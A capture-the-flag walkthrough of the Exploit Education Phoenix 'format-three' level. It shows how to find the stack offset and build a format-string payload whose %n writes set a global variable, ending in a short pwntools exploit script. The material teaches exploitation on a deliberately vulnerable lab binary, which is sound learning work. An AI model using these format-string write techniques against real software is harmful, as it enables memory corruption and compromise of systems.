phoenix - format 3
Lets list the files using ls -la
command,
user@phoenix-amd64:~$ ls -la
total 28
drwxr-xr-x 2 user user 4096 Jun 13 15:44 .
drwxr-xr-x 3 root root 4096 Jan 13 2019 ..
-rw-r--r-- 1 user user 220 Jan 13 2019 .bash_logout
-rw-r--r-- 1 user user 3526 Jan 13 2019 .bashrc
-rw-r--r-- 1 user user 675 Jan 13 2019 .profile
-rwxr-xr-x 1 user user 6120 Jun 13 15:44 format-three
Lets analyze the file type of the binary using file
command,
user@phoenix-amd64:~$ file format-three
format-three: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /opt/phoenix/x86_64-linux-musl/lib/ld-musl-x86_64.so.1, not stripped
It is a not stripped
binary
Lets try running it,
user@phoenix-amd64:~$ ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
monish
monish
Better luck next time - got 0x00000000, wanted 0x64457845!
It seems like we have to overwrite it with some address
Lets analyse it in debugger,
There is a variable named changeme
,
(gdb) info variables
All defined variables:
Non-debugging symbols:
0x00000000004007e8 __GNU_EH_FRAME_HDR
0x0000000000400850 __EH_FRAME_BEGIN__
0x0000000000400890 __FRAME_END__
0x0000000000600898 __CTOR_LIST__
0x00000000006008a0 __CTOR_END__
0x00000000006008a8 __DTOR_LIST__
0x00000000006008b0 __DTOR_END__
0x00000000006008b8 _DYNAMIC
0x00000000006009f8 _GLOBAL_OFFSET_TABLE_
0x0000000000600a38 __dso_handle
0x0000000000600a40 __TMC_END__
0x0000000000600a40 __bss_start
0x0000000000600a40 _edata
0x0000000000600a40 completed
0x0000000000600a48 dtor_idx
0x0000000000600a60 object
0x0000000000600a90 changeme
0x0000000000600a98 _end
changeme
variable is at 0x0000000000600a90
Here 0x0000000000600a90
has bad chars in it, cannot pass null \x00
So lets try 32 bit,
user@phoenix-amd64:~$ nm format-three | grep changeme
08049844 B changeme
So changeme
is at 0x08049844
Lets view the source code for proper understanding,
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BANNER \
"Welcome to " LEVELNAME ", brought to you by https://exploit.education"
int changeme;
void bounce(char *str) {
printf(str);
}
int main(int argc, char **argv) {
char buf[4096];
printf("%s\n", BANNER);
if (read(0, buf, sizeof(buf) - 1) <= 0) {
exit(EXIT_FAILURE);
}
bounce(buf);
if (changeme == 0x64457845) {
puts("Well done, the 'changeme' variable has been changed correctly!");
} else {
printf(
"Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
}
exit(0);
}
The buffer
here has a size of 4096 bytes
The main condition to pass the program is,
if (changeme == 0x64457845) {
puts("Well done, the 'changeme' variable has been changed correctly!");
} else {
printf(
"Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
}
So we have to overwrite the value of changeme
to 0x64457845
>>> print("\x45\x78\x45\x64")
ExEd
It is almost similar to the last challenge
Now lets try to pass our input with format strings to find our offset
user@phoenix-amd64:~$ ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
AAAA 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141 0x20702520 0x25207025 0x70252070
Better luck next time - got 0x00000000, wanted 0x64457845!
So our input AAAA
that we passed to fuzz the offset location is at 12th place
Now,lets try to write it using %n
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*14)" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x8049844 0x20702520 0x25207025
Better luck next time - got 0x00000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0
Better luck next time - got 0x00000054, wanted 0x64457845!
Now lets split changeme
variable into 4 parts
From, 0x08049844
is for last byte (LSB) - 1st part
To,0x08049844+0x3
for first byte (MSB) - 4th part
(1 byte = 8 bits , 1 hex char = 4 bits)
So we are able to write 0x00000054
into changeme
with our inputs and %n
Lets try increasing it by our data into stdin
,
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x44\x98\x04\x08 '+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141
Better luck next time - got 0x00000063, wanted 0x64457845!
Further more,
user@phoenix-amd64:~$ python -c "print('AAAABBBB'+'\x44\x98\x04\x08 '+'%p '*13+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAABBBB 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141 0x42424242
Better luck next time - got 0x00000072, wanted 0x64457845!
So if we pass the correct byte offset address and write the values with %n
we can control it with specific value,
Lets try it from start,
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000054, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'\x45\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000059, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'\x45\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000058, wanted 0x64457845!
So we can clearly see that, we can write 5 bytes if we pass data with white space and 4 bytes if we pass it without white space
Lets pass without white space for easier calculation,
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000053, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000057, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'%p'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0
Better luck next time - got 0x0000004c, wanted 0x64457845!
On second part,
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x45\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x00006200, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x45\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x00005600, wanted 0x64457845!
On third part,
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x46\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x00620000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x46\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x00560000, wanted 0x64457845!
On last part,
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x47\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x62000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x47\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x56000000, wanted 0x64457845!
Now we know what addresses can control what part
But we need to know what data can write the desired number of bytes with %n
into that address
And note that,even our format specifiers can change the number of bytes written
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x53000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%x '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 f7f81cf7 f7ffb000 ffffd748 8048556 ffffc740 ffffc740 fff 0
Better luck next time - got 0x45000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%d '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 -134734601 -134238208 -10424 134514006 -14528 -14528 4095 0
Better luck next time - got 0x46000000, wanted 0x64457845!
So its going to be trial and error from now,
On first byte,
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%x'*11+'AAAAAAAAAAA'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0AAAAAAAAAAA
Better luck next time - got 0x00000045, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%x'*11+'A'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0AAAAAAAAAAA
Better luck next time - got 0x00000045, wanted 0x64457845!
But here comes the tricky part,we cannot pass our addresses at different places
We need to put it in order
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*20)" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x80498440x80498450x80498460x80498470x702570250x702570250x702570250x702570250x70257025
Better luck next time - got 0x00000000, wanted 0x64457845!
We have placed it in order,now lets try our trial and error
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0
Better luck next time - got 0x00000054, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%x'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0
Better luck next time - got 0x00000046, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%d'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000-134734601-134238208-10424134514006-14528-1452840950
Better luck next time - got 0x00000047, wanted 0x64457845!
There is no way we could write it with 45
, so lets aim for 145
>>> int(0x145-0x54)
241
So we need 241 bytes
of junk
value
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00000145, wanted 0x64457845!
Now we overwrote it correctly
Lets do it for second part,
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00014545, wanted 0x64457845!
We need to increase it
>>> int(0x78-0x45)
51
So 51 bytes
of junk
needed
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00017845, wanted 0x64457845!
Now lets go for third part,
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x01787845, wanted 0x64457845!
>>> int(0x145-0x78)
205
We need 205 bytes
of junk
values
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x02457845, wanted 0x64457845!
Our last part,
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x45457845, wanted 0x64457845!
>>> int(0x64-0x45)
31
We need more 31 bytes
of junk
values
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n'+'A'*31+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed correctly!
Thats it! We have completed our challenge
Lets create an exploit for this,
user@phoenix-amd64:~$ cat exploit.py
from pwn import *
junk='A'
changeme=0x08049844
buf=""
buf+=p32(changeme)
buf+=p32(changeme+1)
buf+=p32(changeme+2)
buf+=p32(changeme+3)
buf+='%p'*11
buf+=junk*241
buf+='%n'
buf+=junk*51
buf+='%n'
buf+=junk*205
buf+='%n'
buf+=junk*31
buf+='%n'
print(buf)
Lets try running it,
user@phoenix-amd64:~$ python exploit.py | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed correctly!
Done! We have completed our “format-three” challenge